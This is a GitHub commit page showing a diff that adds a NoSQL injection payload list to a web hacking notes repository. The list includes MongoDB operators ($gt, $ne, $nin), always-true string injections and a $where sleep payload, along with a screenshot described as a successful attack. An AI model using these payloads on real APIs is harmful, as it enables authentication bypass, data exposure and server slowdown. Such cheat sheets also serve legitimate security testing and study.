vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update NoSQL Injection.md

Browse Source
This commit is contained in:
Mehdi 2024-07-27 08:47:26 +03:30 committed by GitHub
parent 033a4d2cbe
commit a5b4f9d94f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
NoSQL Injection.md
View File

@ -1,5 +1,33 @@
# NoSQL Injection # NoSQL Injection
## Exploit ## Exploit
* The following are common NoSQL metacharacters you could send in an API call to manipulate the database:
```bash
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
|| '1'=='1
//
||'a'\\'a
'||'1'=='1';//
'/{}:
'"\;{}
'"\/$[].>
{"$where": "sleep(1000)"}
```
* **Successful NoSQL injection attack using Postman:**
![nosql](https://github.com/user-attachments/assets/3dd58830-ea8e-4444-b518-0889951a4779)
**PHP** **PHP**
The exploits are based in adding an Operator The exploits are based in adding an Operator